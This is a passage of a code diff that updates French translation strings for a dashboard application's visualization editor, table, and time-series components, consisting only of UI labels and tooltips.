"Auto", - "visDefaultEditor.controls.maxBars.maxBarsHelpText": "Les intervalles seront sélectionnés automatiquement en fonction des données disponibles. Le nombre maximal de barres ne peut jamais être supérieur à la valeur {histogramMaxBars} des paramètres avancés.", "visDefaultEditor.controls.maxBars.maxBarsLabel": "Barres max.", "visDefaultEditor.controls.metricLabel": "Indicateur", "visDefaultEditor.controls.metrics.bucketTitle": "Compartiment", "visDefaultEditor.controls.metrics.metricTitle": "Indicateur", "visDefaultEditor.controls.numberInterval.autoInteralIsUsed": "L'intervalle automatique est utilisé.", - "visDefaultEditor.controls.numberInterval.minimumIntervalLabel": "Intervalle minimum", - "visDefaultEditor.controls.numberInterval.minimumIntervalTooltip": "L'intervalle sera scalé automatiquement si la valeur fournie crée plus de compartiments que ce qui est spécifié par la valeur {histogramMaxBars} dans les paramètres avancés.", + "visDefaultEditor.controls.numberInterval.minimumIntervalLabel": "Intervalle minimal", "visDefaultEditor.controls.numberInterval.selectIntervalPlaceholder": "Saisir un intervalle", - "visDefaultEditor.controls.numberList.addUnitButtonLabel": "Ajouter {unitName}", "visDefaultEditor.controls.numberList.duplicateValueErrorMessage": "Dupliquez la valeur.", "visDefaultEditor.controls.numberList.enterValuePlaceholder": "Saisir une valeur", "visDefaultEditor.controls.numberList.invalidAscOrderErrorMessage": "La valeur n'est pas dans l'ordre croissant.", - "visDefaultEditor.controls.numberList.invalidRangeErrorMessage": "La valeur doit être comprise dans la plage allant de {min} à {max}.", - "visDefaultEditor.controls.numberList.removeUnitButtonAriaLabel": "Supprimer la valeur de rang de {value}", "visDefaultEditor.controls.onlyRequestDataAroundMapExtentLabel": "Demander uniquement des données sur l'étendue de la carte", "visDefaultEditor.controls.onlyRequestDataAroundMapExtentTooltip": "Appliquer l'agrégation de filtres geo_bounding_box pour réduire la zone d’intérêt à la zone d'affichage de la carte avec collier", "visDefaultEditor.controls.orderAgg.alphabeticalLabel": "Alphabétique", "visDefaultEditor.controls.orderAgg.orderByLabel": "Classer par", "visDefaultEditor.controls.orderLabel": "Ordre", "visDefaultEditor.controls.otherBucket.groupValuesLabel": "Regrouper les autres valeurs dans un compartiment séparé", - "visDefaultEditor.controls.otherBucket.groupValuesTooltip": "Les valeurs qui ne sont pas dans le top N sont regroupées dans ce compartiment. Pour inclure les documents avec des valeurs manquantes, activez l'option \"Afficher les valeurs manquantes\".", + "visDefaultEditor.controls.otherBucket.groupValuesTooltip": "Les valeurs qui ne sont pas dans le top N sont regroupées dans ce compartiment. Pour inclure les documents avec des valeurs manquantes, activez l'option \"Afficher les valeurs manquantes\".", "visDefaultEditor.controls.otherBucket.showMissingValuesLabel": "Afficher les valeurs manquantes", - "visDefaultEditor.controls.otherBucket.showMissingValuesTooltip": "Ne fonctionne que pour les champs de type \"chaîne\". Lorsque cette option est activée, les documents avec des valeurs manquantes sont inclus dans la recherche. Si ce compartiment est dans le top N, il apparaît dans le graphique. S'il n'est pas dans le top N et que l’option \"Regrouper les autres valeurs dans un compartiment séparé\" est activée, Elasticsearch ajoute les valeurs manquantes à \"l'autre\" compartiment.", + "visDefaultEditor.controls.otherBucket.showMissingValuesTooltip": "Ne fonctionne que pour les champs de type \"chaîne\". Lorsque cette option est activée, les documents avec des valeurs manquantes sont inclus dans la recherche. Si ce compartiment est dans le top N, il apparaît dans le graphique. S'il n'est pas dans le top N et que l’option \"Regrouper les autres valeurs dans un compartiment séparé\" est activée, Elasticsearch ajoute les valeurs manquantes à \"l'autre\" compartiment.", "visDefaultEditor.controls.percentileRanks.percentUnitNameText": "pour cent", "visDefaultEditor.controls.percentileRanks.valuesLabel": "Valeurs", "visDefaultEditor.controls.percentileRanks.valueUnitNameText": "valeur", @@ -6011,28 +5322,23 @@ "visDefaultEditor.controls.ranges.greaterThanOrEqualTooltip": "Supérieur ou égal à", "visDefaultEditor.controls.ranges.lessThanPrepend": "<", "visDefaultEditor.controls.ranges.lessThanTooltip": "Inférieur à", - "visDefaultEditor.controls.ranges.removeRangeButtonAriaLabel": "Supprimer la plage allant de {from} à {to}", - "visDefaultEditor.controls.ranges.toLabel": "Au", + "visDefaultEditor.controls.ranges.toLabel": "À", "visDefaultEditor.controls.rowsLabel": "Lignes", "visDefaultEditor.controls.scaleMetricsLabel": "Scaler les valeurs des indicateurs (déclassé)", "visDefaultEditor.controls.scaleMetricsTooltip": "Si vous sélectionnez un intervalle minimal manuel et qu'un intervalle plus grand est utilisé, l'activation de cette option entraînera le scaling des indicateurs de décompte et de somme à l'intervalle manuel sélectionné.", "visDefaultEditor.controls.showEmptyBucketsLabel": "Afficher les compartiments vides", "visDefaultEditor.controls.showEmptyBucketsTooltip": "Afficher tous les compartiments, pas seulement ceux avec des résultats", "visDefaultEditor.controls.sizeLabel": "Taille", - "visDefaultEditor.controls.sizeTooltip": "Demander les K premiers résultats. Plusieurs résultats seront combinés par le biais de \"agréger avec\".", + "visDefaultEditor.controls.sizeTooltip": "Demander les K premiers résultats. Plusieurs résultats seront combinés par le biais de \"agréger avec\".", "visDefaultEditor.controls.sortOnLabel": "Trier en fonction de", "visDefaultEditor.controls.splitByLegend": "Diviser le graphique par lignes ou colonnes.", "visDefaultEditor.controls.timeInterval.createsTooLargeBucketsTooltip": "Cet intervalle crée des compartiments trop grands pour permettre l’affichage dans la plage temporelle sélectionnée, il a donc été réduit.", "visDefaultEditor.controls.timeInterval.createsTooManyBucketsTooltip": "Cet intervalle crée trop de compartiments pour permettre l’affichage dans la plage temporelle sélectionnée, il a donc été augmenté.", "visDefaultEditor.controls.timeInterval.invalidFormatErrorMessage": "Format d'intervalle non valide.", - "visDefaultEditor.controls.timeInterval.minimumIntervalLabel": "Intervalle minimum", - "visDefaultEditor.controls.timeInterval.scaledHelpText": "Actuellement scalé à {bucketDescription}", + "visDefaultEditor.controls.timeInterval.minimumIntervalLabel": "Intervalle minimal", "visDefaultEditor.controls.timeInterval.selectIntervalPlaceholder": "Choisir un intervalle", - "visDefaultEditor.controls.timeInterval.selectOptionHelpText": "Choisissez une option ou créez une valeur personnalisée. Exemples : 30s, 20m, 24h, 2d, 1w, 1M", + "visDefaultEditor.controls.timeInterval.selectOptionHelpText": "Choisissez une option ou créez une valeur personnalisée. Exemples : 30s, 20m, 24h, 2d, 1w, 1M", "visDefaultEditor.controls.useAutoInterval": "Utiliser l'intervalle automatique", - "visDefaultEditor.editorConfig.dateHistogram.customInterval.helpText": "Doit être un multiple de l'intervalle de configuration : {interval}.", - "visDefaultEditor.editorConfig.histogram.interval.helpText": "Doit être un multiple de l'intervalle de configuration : {interval}.", - "visDefaultEditor.metrics.wrongLastBucketTypeErrorMessage": "La dernière agrégation de compartiments doit être \"Histogramme de date\" ou \"Histogramme\" lorsque vous utilisez l'agrégation d'indicateurs \"{type}\".", "visDefaultEditor.options.colorRanges.errorText": "Chaque plage doit être supérieure à la précédente.", "visDefaultEditor.options.colorSchema.colorSchemaLabel": "Schéma de couleurs", "visDefaultEditor.options.colorSchema.howToChangeColorsDescription": "Les couleurs individuelles peuvent être modifiées dans la légende.", @@ -6050,154 +5356,32 @@ "visDefaultEditor.options.percentageMode.documentationLabel": "Documentation Numeral.js", "visDefaultEditor.options.percentageMode.numeralLabel": "Modèle de format", "visDefaultEditor.options.percentageMode.percentageModeLabel": "Mode de pourcentage", - "visDefaultEditor.options.rangeErrorMessage": "Les valeurs doivent être comprises entre {min} et {max}, inclus.", "visDefaultEditor.options.vislibBasicOptions.legendPositionLabel": "Position de la légende", "visDefaultEditor.options.vislibBasicOptions.showTooltipLabel": "Afficher l'infobulle", "visDefaultEditor.palettePicker.label": "Palette de couleurs", "visDefaultEditor.sidebar.autoApplyChangesLabelOff": "Application automatique désactivée", "visDefaultEditor.sidebar.autoApplyChangesLabelOn": "Application automatique activée", - "visDefaultEditor.sidebar.autoApplyChangesOff": "Off", - "visDefaultEditor.sidebar.autoApplyChangesOffLabel": "Application automatique désactivée", - "visDefaultEditor.sidebar.autoApplyChangesOn": "On", - "visDefaultEditor.sidebar.autoApplyChangesOnLabel": "Application automatique activée", - "visDefaultEditor.sidebar.autoApplyChangesTooltip": "Met automatiquement à jour la visualisation à chaque modification.", - "visDefaultEditor.sidebar.collapseButtonAriaLabel": "Activer/Désactiver la barre latérale", - "visDefaultEditor.sidebar.discardChangesButtonLabel": "Abandonner", - "visDefaultEditor.sidebar.errorButtonTooltip": "Les erreurs dans les champs mis en évidence doivent être corrigées.", - "visDefaultEditor.sidebar.indexPatternAriaLabel": "Modèle d'indexation : {title}", - "visDefaultEditor.sidebar.savedSearch.goToDiscoverButtonText": "Afficher cette recherche dans Discover", - "visDefaultEditor.sidebar.savedSearch.linkButtonAriaLabel": "Lier à la recherche enregistrée. Cliquez pour en savoir plus ou rompre le lien.", - "visDefaultEditor.sidebar.savedSearch.popoverHelpText": "Les modifications apportées ultérieurement à cette recherche enregistrée sont reflétées dans la visualisation. Pour désactiver les mises à jour automatiques, supprimez le lien.", - "visDefaultEditor.sidebar.savedSearch.popoverTitle": "Lié à la recherche enregistrée", - "visDefaultEditor.sidebar.savedSearch.titleAriaLabel": "Recherche enregistrée : {title}", - "visDefaultEditor.sidebar.savedSearch.unlinkSavedSearchButtonText": "Supprimer le lien avec la recherche enregistrée", - "visDefaultEditor.sidebar.tabs.dataLabel": "Données", - "visDefaultEditor.sidebar.tabs.optionsLabel": "Options", - "visDefaultEditor.sidebar.updateChartButtonLabel": "Mettre à jour", - "visDefaultEditor.sidebar.updateInfoTooltip": "CTRL + Entrée est le raccourci clavier pour Mettre à jour.", - "visTypeGauge.advancedSettings.visualization.legacyGaugeChartsLibrary.description": "Active la bibliothèque de graphiques héritée pour les graphiques de jauge dans Visualize.", - "visTypeGauge.advancedSettings.visualization.legacyGaugeChartsLibrary.name": "Bibliothèque de graphiques héritée pour les jauges", - "visTypeGauge.controls.gaugeOptions.alignmentLabel": "Alignement", - "visTypeGauge.controls.gaugeOptions.autoExtendRangeLabel": "Étendre automatiquement la plage", - "visTypeGauge.controls.gaugeOptions.extendRangeTooltip": "Étend la plage jusqu'à la valeur maximale de vos données.", - "visTypeGauge.controls.gaugeOptions.extendRangeTooltipNotAvailable": "La nouvelle bibliothèque de graphiques n’est compatible qu’avec les plages étendues. Pour la désactiver, veuillez activer le paramètre avancé de la bibliothèque de graphiques héritée pour les jauges.", - "visTypeGauge.controls.gaugeOptions.gaugeTypeLabel": "Type de jauge", - "visTypeGauge.controls.gaugeOptions.labelsTitle": "Étiquettes", - "visTypeGauge.controls.gaugeOptions.rangesTitle": "Plages", - "visTypeGauge.controls.gaugeOptions.showLabelsLabel": "Afficher les étiquettes", - "visTypeGauge.controls.gaugeOptions.showLegendLabel": "Afficher la légende", - "visTypeGauge.controls.gaugeOptions.showLegendNotAvailable": "La légende n’est pas prise en charge avec la nouvelle bibliothèque de graphiques. Veuillez activer le paramètre avancé de la bibliothèque de graphiques héritée pour les jauges.", - "visTypeGauge.controls.gaugeOptions.showOutline": "Afficher le contour", - "visTypeGauge.controls.gaugeOptions.showOutlineNotAvailable": "Le contour n’est pas pris en charge avec la nouvelle bibliothèque de graphiques. Veuillez activer le paramètre avancé de la bibliothèque de graphiques héritée pour les jauges.", - "visTypeGauge.controls.gaugeOptions.showScaleLabel": "Afficher l'échelle", - "visTypeGauge.controls.gaugeOptions.styleTitle": "Style", - "visTypeGauge.controls.gaugeOptions.subTextLabel": "Sous-étiquette", - "visTypeGauge.editors.gauge.alignmentNotAvailable": "l'alignement n’est pas encore pris en charge avec la nouvelle bibliothèque de graphiques. Veuillez activer le paramètre avancé de la bibliothèque de graphiques héritée pour les jauges.", - "visTypeGauge.gauge.alignmentAutomaticTitle": "Automatique", - "visTypeGauge.gauge.alignmentHorizontalTitle": "Horizontal", - "visTypeGauge.gauge.alignmentVerticalTitle": "Vertical", - "visTypeGauge.gauge.gaugeDescription": "Affichez le statut d'un indicateur.", - "visTypeGauge.gauge.gaugeTitle": "Jauge", - "visTypeGauge.gauge.gaugeTypes.arcText": "Arc", - "visTypeGauge.gauge.gaugeTypes.circleText": "Cercle", - "visTypeGauge.gauge.groupTitle": "Diviser le groupe", - "visTypeGauge.gauge.metricTitle": "Indicateur", - "visTypeGauge.goal.goalDescription": "Suivez la progression d'un indicateur vers un objectif.", - "visTypeGauge.goal.goalTitle": "Objectif", - "visTypeGauge.goal.groupTitle": "Diviser le groupe", - "visTypeGauge.goal.metricTitle": "Indicateur", - "visTypeGauge.splitTitle.tooltip": "l'agrégation de graphique divisé n’est pas encore compatible avec la nouvelle bibliothèque de graphiques. Veuillez activer le paramètre avancé de la bibliothèque de graphiques héritée pour les jauges afin d'utiliser l'agrégation de graphique divisé.", - "visTypeHeatmap.advancedSettings.visualization.legacyHeatmapChartsLibrary.description": "Active la bibliothèque de graphiques héritée pour les graphiques à carte thermique dans Visualize.", - "visTypeHeatmap.advancedSettings.visualization.legacyHeatmapChartsLibrary.name": "Bibliothèque de graphiques héritée pour les cartes thermiques", - "visTypeHeatmap.controls.heatmapOptions.colorLabel": "Couleur", - "visTypeHeatmap.controls.heatmapOptions.colorScaleLabel": "Échelle de couleurs", - "visTypeHeatmap.controls.heatmapOptions.colorsNumberLabel": "Nombre de couleurs", - "visTypeHeatmap.controls.heatmapOptions.labelsTitle": "Étiquettes", - "visTypeHeatmap.controls.heatmapOptions.overwriteAutomaticColorLabel": "Écraser la couleur automatique", - "visTypeHeatmap.controls.heatmapOptions.rotateLabel": "Faire pivoter", - "visTypeHeatmap.controls.heatmapOptions.scaleToDataBoundsLabel": "Scaler sur les limites de données", - "visTypeHeatmap.controls.heatmapOptions.showLabelsTitle": "Afficher les étiquettes", - "visTypeHeatmap.controls.heatmapOptions.useCustomRangesLabel": "Utiliser les plages personnalisées", - "visTypeHeatmap.editors.heatmap.basicSettingsTitle": "Paramètres de base", - "visTypeHeatmap.editors.heatmap.colorScaleTooltipNotAvailable": "l'échelle de couleurs n’est pas compatible avec la nouvelle bibliothèque de graphiques. Veuillez activer le paramètre avancé de la bibliothèque de graphiques héritée pour les cartes thermiques.", - "visTypeHeatmap.editors.heatmap.heatmapSettingsTitle": "Paramètres de la carte thermique", - "visTypeHeatmap.editors.heatmap.highlightLabel": "Mettre la plage en surbrillance", - "visTypeHeatmap.editors.heatmap.highlightLabelTooltip": "Met en surbrillance la plage survolée dans le graphique et l'étiquette correspondante dans la légende.", - "visTypeHeatmap.editors.heatmap.highlightLabelTooltipNotAvailable": "La mise en surbrillance de la plage survolée n’est pas encore compatible avec la nouvelle bibliothèque de graphiques. Veuillez activer le paramètre avancé de la bibliothèque de graphiques héritée pour les cartes thermiques.", - "visTypeHeatmap.editors.heatmap.overwriteColorlNotAvailable": "Le remplacement automatique des couleurs n’est pas compatible avec la nouvelle bibliothèque de graphiques. Veuillez activer le paramètre avancé de la bibliothèque de graphiques héritée pour les cartes thermiques.", - "visTypeHeatmap.editors.heatmap.rotateLabelNotAvailable": "La rotation de l'étiquette n’est pas compatible avec la nouvelle bibliothèque de graphiques. Veuillez activer le paramètre avancé de la bibliothèque de graphiques héritée pour les cartes thermiques.", - "visTypeHeatmap.heatmap.groupTitle": "Axe Y", - "visTypeHeatmap.heatmap.heatmapDescription": "Affichez les valeurs en tant que couleurs dans une matrice.", - "visTypeHeatmap.heatmap.heatmapTitle": "Carte thermique", - "visTypeHeatmap.heatmap.metricTitle": "Valeur", - "visTypeHeatmap.heatmap.segmentTitle": "Axe X", - "visTypeHeatmap.heatmap.splitTitle": "Diviser le graphique", - "visTypeHeatmap.legendPositions.bottomText": "Bas", - "visTypeHeatmap.legendPositions.leftText": "Gauche", - "visTypeHeatmap.legendPositions.rightText": "Droite", - "visTypeHeatmap.legendPositions.topText": "Haut", - "visTypeHeatmap.scaleTypes.linearText": "Linéaire", - "visTypeHeatmap.scaleTypes.logText": "Logarithmique", - "visTypeHeatmap.scaleTypes.squareRootText": "Racine carrée", - "visTypeHeatmap.splitTitle.tooltip": "l'agrégation de graphique divisé n’est pas encore compatible avec la nouvelle bibliothèque de graphiques. Veuillez activer le paramètre avancé de la bibliothèque de graphiques héritée pour les cartes thermiques afin d'utiliser l'agrégation de graphique divisé.", - "visTypeMarkdown.function.font.help": "Paramètres de police.", - "visTypeMarkdown.function.help": "Visualisation Markdown", - "visTypeMarkdown.function.markdown.help": "Markdown à rendre", - "visTypeMarkdown.function.openLinksInNewTab.help": "Ouvre les liens dans un nouvel onglet", - "visTypeMarkdown.markdownDescription": "Ajoutez du texte et des images à votre tableau de bord.", - "visTypeMarkdown.markdownTitleInWizard": "Texte", - "visTypeMarkdown.params.fontSizeLabel": "Taille de police de base en points", - "visTypeMarkdown.params.helpLinkLabel": "Aide", - "visTypeMarkdown.params.openLinksLabel": "Ouvrir les liens dans un nouvel onglet", - "visTypeMarkdown.tabs.dataText": "Données", - "visTypeMarkdown.tabs.optionsText": "Options", - "visTypeMetric.colorModes.backgroundOptionLabel": "Arrière-plan", - "visTypeMetric.colorModes.labelsOptionLabel": "Étiquettes", - "visTypeMetric.colorModes.noneOptionLabel": "Aucun", - "visTypeMetric.metricDescription": "Affiche un calcul sous la forme d'un nombre unique.", - "visTypeMetric.metricTitle": "Indicateur", - "visTypeMetric.params.color.useForLabel": "Utiliser la couleur pour", - "visTypeMetric.params.rangesTitle": "Plages", - "visTypeMetric.params.settingsTitle": "Paramètres", - "visTypeMetric.params.showTitleLabel": "Afficher le titre", - "visTypeMetric.params.style.fontSizeLabel": "Taille de police de l'indicateur en points", - "visTypeMetric.params.style.styleTitle": "Style", - "visTypeMetric.schemas.metricTitle": "Indicateur", - "visTypeMetric.schemas.splitGroupTitle": "Diviser le groupe", - "visTypePie.advancedSettings.visualization.legacyPieChartsLibrary.deprecation": "La bibliothèque de graphiques héritée pour les camemberts dans Visualize est déclassée et ne sera plus compatible dans une prochaine version.", - "visTypePie.advancedSettings.visualization.legacyPieChartsLibrary.description": "Active la bibliothèque de graphiques héritée pour les camemberts dans Visualize.", - "visTypePie.advancedSettings.visualization.legacyPieChartsLibrary.name": "Bibliothèque de graphiques héritée pour les camemberts", - "visTypePie.controls.truncateLabel": "Tronquer", - "visTypePie.controls.truncateTooltip": "Nombre de caractères pour les étiquettes positionnées en dehors du graphique.", - "visTypePie.editors.pie.decimalSliderLabel": "Nombre maximal de décimales pour les pourcentages", - "visTypePie.editors.pie.distinctColorsLabel": "Utiliser des couleurs distinctes pour chaque section", - "visTypePie.editors.pie.donutLabel": "Graphique en anneau", - "visTypePie.editors.pie.emptySizeRatioLabel": "Taille de la zone intérieure", - "visTypePie.editors.pie.labelPositionLabel": "Position de l'étiquette", - "visTypePie.editors.pie.labelsSettingsTitle": "Paramètres des étiquettes", - "visTypePie.editors.pie.legendDisplayLabel": "Afficher la légende", - "visTypePie.editors.pie.nestedLegendLabel": "Imbriquer la légende", - "visTypePie.editors.pie.pieSettingsTitle": "Paramètres du camembert", - "visTypePie.editors.pie.showLabelsLabel": "Afficher les étiquettes", - "visTypePie.editors.pie.showTopLevelOnlyLabel": "Afficher uniquement le niveau supérieur", - "visTypePie.editors.pie.showValuesLabel": "Afficher les valeurs", - "visTypePie.editors.pie.valueFormatsLabel": "Valeurs", - "visTypePie.emptySizeRatioOptions.large": "Large", - "visTypePie.emptySizeRatioOptions.medium": "Moyenne", - "visTypePie.emptySizeRatioOptions.small": "Petite", - "visTypePie.labelPositions.insideOrOutsideText": "Intérieur ou extérieur", - "visTypePie.labelPositions.insideText": "Intérieur", - "visTypePie.legendPositions.bottomText": "Bas", - "visTypePie.legendPositions.leftText": "Gauche", - "visTypePie.legendPositions.rightText": "Droite", - "visTypePie.legendPositions.topText": "Haut", - "visTypePie.pie.metricTitle": "Taille de section", - "visTypePie.pie.pieDescription": "Comparez des données proportionnellement à un ensemble.", - "visTypePie.pie.pieTitle": "Camembert", - "visTypePie.pie.segmentTitle": "Diviser les sections", - "visTypePie.pie.splitTitle": "Diviser le graphique", - "visTypePie.valuesFormats.percent": "Afficher le pourcentage", - "visTypePie.valuesFormats.value": "Afficher la valeur", + "visDefaultEditor.sidebar.autoApplyChangesOff": "Off", + "visDefaultEditor.sidebar.autoApplyChangesOffLabel": "Application automatique désactivée", + "visDefaultEditor.sidebar.autoApplyChangesOn": "On", + "visDefaultEditor.sidebar.autoApplyChangesOnLabel": "Application automatique activée", + "visDefaultEditor.sidebar.autoApplyChangesTooltip": "Met automatiquement à jour la visualisation à chaque modification.", + "visDefaultEditor.sidebar.collapseButtonAriaLabel": "Activer/Désactiver la barre latérale", + "visDefaultEditor.sidebar.discardChangesButtonLabel": "Abandonner", + "visDefaultEditor.sidebar.errorButtonTooltip": "Les erreurs dans les champs mis en évidence doivent être corrigées.", + "visDefaultEditor.sidebar.savedSearch.goToDiscoverButtonText": "Afficher cette recherche dans Discover", + "visDefaultEditor.sidebar.savedSearch.linkButtonAriaLabel": "Lier à la recherche enregistrée. Cliquez pour en savoir plus ou rompre le lien.", + "visDefaultEditor.sidebar.savedSearch.popoverHelpText": "Les modifications apportées ultérieurement à cette recherche enregistrée sont reflétées dans la visualisation. Pour désactiver les mises à jour automatiques, supprimez le lien.", + "visDefaultEditor.sidebar.savedSearch.popoverTitle": "Lié à la recherche enregistrée", + "visDefaultEditor.sidebar.savedSearch.unlinkSavedSearchButtonText": "Supprimer le lien avec la recherche enregistrée", + "visDefaultEditor.sidebar.tabs.dataLabel": "Données", + "visDefaultEditor.sidebar.tabs.optionsLabel": "Options", + "visDefaultEditor.sidebar.updateChartButtonLabel": "Mettre à jour", + "visDefaultEditor.sidebar.updateInfoTooltip": "CTRL + Entrée est le raccourci clavier pour Mettre à jour.", + "visTypeTable.params.percentageTableColumnName": "Pourcentages de {title}", + "visTypeTable.tableCellFilter.filterForValueAriaLabel": "Filtrer sur la valeur : {cellContent}", + "visTypeTable.tableCellFilter.filterOutValueAriaLabel": "Exclure la valeur : {cellContent}", + "visTypeTable.vis.controls.exportButtonAriaLabel": "Exporter {dataGridAriaLabel} au format CSV", "visTypeTable.defaultAriaLabel": "Visualisation du tableau de données", "visTypeTable.function.adimension.buckets": "Compartiments", "visTypeTable.function.args.bucketsHelpText": "Configuration des dimensions de compartiment", @@ -6209,8 +5393,8 @@ "visTypeTable.function.args.showTotalHelpText": "Définir sur \"vrai\" pour afficher le nombre total de lignes", "visTypeTable.function.args.splitColumnHelpText": "Diviser par la configuration des dimensions de colonne", "visTypeTable.function.args.splitRowHelpText": "Diviser par la configuration des dimensions de ligne", - "visTypeTable.function.args.titleHelpText": "Titre de la visualisation. Le titre est utilisé comme nom de fichier par défaut pour l'exportation CSV.", - "visTypeTable.function.args.totalFuncHelpText": "Spécifie la fonction de calcul du nombre total de lignes. Les options possibles sont : ", + "visTypeTable.function.args.titleHelpText": "Titre de la visualisation. Le titre est utilisé comme nom de fichier par défaut pour l'exportation CSV.", + "visTypeTable.function.args.totalFuncHelpText": "Spécifie la fonction de calcul du nombre total de lignes. Les options possibles sont : ", "visTypeTable.function.dimension.metrics": "Indicateurs", "visTypeTable.function.dimension.splitColumn": "Diviser par colonne", "visTypeTable.function.dimension.splitRow": "Diviser par ligne", @@ -6218,7 +5402,6 @@ "visTypeTable.params.autoFitRow": "Ajuster automatiquement les lignes au contenu", "visTypeTable.params.defaultPercentageCol": "Ne pas afficher", "visTypeTable.params.PercentageColLabel": "Colonne de pourcentage", - "visTypeTable.params.percentageTableColumnName": "Pourcentages de {title}", "visTypeTable.params.perPageLabel": "Nombre max. de lignes par page", "visTypeTable.params.showMetricsLabel": "Afficher les indicateurs pour chaque compartiment/niveau", "visTypeTable.params.showPartialRowsLabel": "Afficher les lignes partielles", @@ -6228,9 +5411,7 @@ "visTypeTable.params.totalFunctionLabel": "Fonction de total", "visTypeTable.sort.ascLabel": "Tri croissant", "visTypeTable.sort.descLabel": "Tri décroissant", - "visTypeTable.tableCellFilter.filterForValueAriaLabel": "Filtrer sur la valeur : {cellContent}", "visTypeTable.tableCellFilter.filterForValueText": "Filtrer sur la valeur", - "visTypeTable.tableCellFilter.filterOutValueAriaLabel": "Exclure la valeur : {cellContent}", "visTypeTable.tableCellFilter.filterOutValueText": "Exclure la valeur", "visTypeTable.tableVisDescription": "Affichez des données en lignes et en colonnes.", "visTypeTable.tableVisEditorConfig.schemas.bucketTitle": "Diviser les lignes", @@ -6242,25 +5423,58 @@ "visTypeTable.totalAggregations.maxText": "Max.", "visTypeTable.totalAggregations.minText": "Min.", "visTypeTable.totalAggregations.sumText": "Somme", - "visTypeTable.vis.controls.exportButtonAriaLabel": "Exporter {dataGridAriaLabel} au format CSV", - "visTypeTable.vis.controls.exportButtonFormulasWarning": "Votre fichier CSV contient des caractères que les applications de feuilles de calcul pourraient considérer comme des formules.", + "visTypeTable.vis.controls.exportButtonFormulasWarning": "Votre fichier CSV contient des caractères que les applications de feuilles de calcul pourraient considérer comme des formules.", "visTypeTable.vis.controls.exportButtonLabel": "Exporter", "visTypeTable.vis.controls.formattedCSVButtonLabel": "Formaté", "visTypeTable.vis.controls.rawCSVButtonLabel": "Brut", - "visTypeTagCloud.orientations.multipleText": "Multiple", - "visTypeTagCloud.orientations.rightAngledText": "Angle droit", - "visTypeTagCloud.orientations.singleText": "Unique", - "visTypeTagCloud.scales.linearText": "Linéaire", - "visTypeTagCloud.scales.logText": "Logarithmique", - "visTypeTagCloud.scales.squareRootText": "Racine carrée", - "visTypeTagCloud.vis.schemas.metricTitle": "Taille de balise", - "visTypeTagCloud.vis.schemas.segmentTitle": "Balises", - "visTypeTagCloud.vis.tagCloudDescription": "Affichez la fréquence des mots avec la taille de police.", - "visTypeTagCloud.vis.tagCloudTitle": "Nuage de balises", - "visTypeTagCloud.visParams.fontSizeLabel": "Plage de taille de police en pixels", - "visTypeTagCloud.visParams.orientationsLabel": "Orientations", - "visTypeTagCloud.visParams.showLabelToggleLabel": "Afficher l'étiquette", - "visTypeTagCloud.visParams.textScaleLabel": "Échelle de texte", + "visTypeTimeseries.advancedSettings.allowStringIndicesText": "Vous permet d'interroger les index Elasticsearch dans les visualisations TSVB.", + "visTypeTimeseries.agg.aggIsNotSupportedDescription": "L'agrégation {modelType} n'est plus prise en charge.", + "visTypeTimeseries.agg.aggIsUnsupportedForPanelConfigDescription": "l'agrégation {modelType} n’est pas compatible pour la configuration de panneau existante.", + "visTypeTimeseries.annotationRequest.label": "Annotation : {id}", + "visTypeTimeseries.annotationsEditor.rowTemplateHelpText": "eg.{rowTemplateExample}", + "visTypeTimeseries.axisLabelOptions.axisLabel": "par {unitValue} {unitString}", + "visTypeTimeseries.calculateLabel.metricTypeOfMetricFieldRankLabel": "{metricTypeLabel} de {metricField}", + "visTypeTimeseries.calculateLabel.metricTypeOfTargetLabel": "{metricTypeLabel} de {targetLabel}", + "visTypeTimeseries.calculateLabel.metricTypeOfTargetWithAdditionalLabel": "{metricTypeLabel} de {targetLabel} ({additionalLabel})", + "visTypeTimeseries.calculateLabel.positiveRateLabel": "Taux de compteur de {field}", + "visTypeTimeseries.calculateLabel.seriesAggLabel": "Agrégation de séries ({metricFunction})", + "visTypeTimeseries.calculateLabel.staticValueLabel": "Valeur statique de {metricValue}", + "visTypeTimeseries.calculation.painlessScriptDescription": "Les variables sont des clés sur l'objet {params}, c.-à-d. {paramsName}. Pour accéder à l'intervalle de compartiment (en millisecondes), utilisez {paramsInterval}.", + "visTypeTimeseries.colorPicker.notAccessibleWithValueAriaLabel": "Sélecteur de couleur ({value}), non accessible", + "visTypeTimeseries.colorRules.setPrimaryColorLabel": "Définissez {primaryName} sur", + "visTypeTimeseries.colorRules.setSecondaryColorLabel": "et {secondaryName} sur", + "visTypeTimeseries.dataFormatPicker.formatPatternLabel": "Modèle de format Numeral.js (par défaut : {defaultPattern})", + "visTypeTimeseries.errors.dataViewNotFoundError": "Impossible de trouver la vue de données : {dataViewId}", + "visTypeTimeseries.errors.fieldNotFound": "Champ \"{field}\" introuvable", + "visTypeTimeseries.externalUrlErrorModal.bodyMessage": "Configurez {externalUrlPolicy} dans votre {kibanaConfigFileName} pour autoriser l'accès à {url}.", + "visTypeTimeseries.fieldSelect.fieldIsNotValid": "La sélection \"{fieldParameter}\" n'est pas valide pour une utilisation avec l'index actuel.", + "visTypeTimeseries.fieldUtils.multiFieldLabel": "{firstFieldLabel} + {count} {count, plural, one {autre} other {autres}}", + "visTypeTimeseries.indexPattern.detailLevelHelpText": "Contrôle les intervalles auto et gte en fonction de la plage temporelle. Les paramètres avancés {histogramTargetBars} et {histogramMaxBars} ont un impact sur l'intervalle par défaut.", + "visTypeTimeseries.indexPattern.timeRange.error": "Vous ne pouvez pas utiliser \"{mode}\" avec le type d'index actuel.", + "visTypeTimeseries.indexPatternSelect.defaultDataViewText": "Utilisation de la vue de données par défaut. {queryAllIndicesHelpText}", + "visTypeTimeseries.indexPatternSelect.queryAllIndicesText": "Pour interroger tous les index, utilisez {asterisk}.", + "visTypeTimeseries.indexPatternSelect.switchModePopover.enableAllowStringIndices": "Pour interroger des index Elasticsearch, vous devez activer le paramètre {allowStringIndices}.", + "visTypeTimeseries.indexPatternSelect.switchModePopover.text": "Une vue de données regroupe et récupère les données à partir d'Elasticsearch. Désactivez ce mode pour interroger directement les index Elasticsearch. {allowStringIndicesLabel}", + "visTypeTimeseries.lastValueModeIndicator.lastBucketDate": "Compartiment : {lastBucketDate}", + "visTypeTimeseries.lastValueModeIndicator.panelInterval": "Intervalle : {formattedPanelInterval}", + "visTypeTimeseries.markdownEditor.howToAccessEntireTreeDescription": "Il existe également une variable spéciale nommée {all} que vous pouvez utiliser pour accéder à l'ensemble de l'arborescence. C'est utile pour créer des listes avec des données à l'aide d'une action Regrouper par :", + "visTypeTimeseries.markdownEditor.howToUseVariablesInMarkdownDescription": "Les variables suivantes 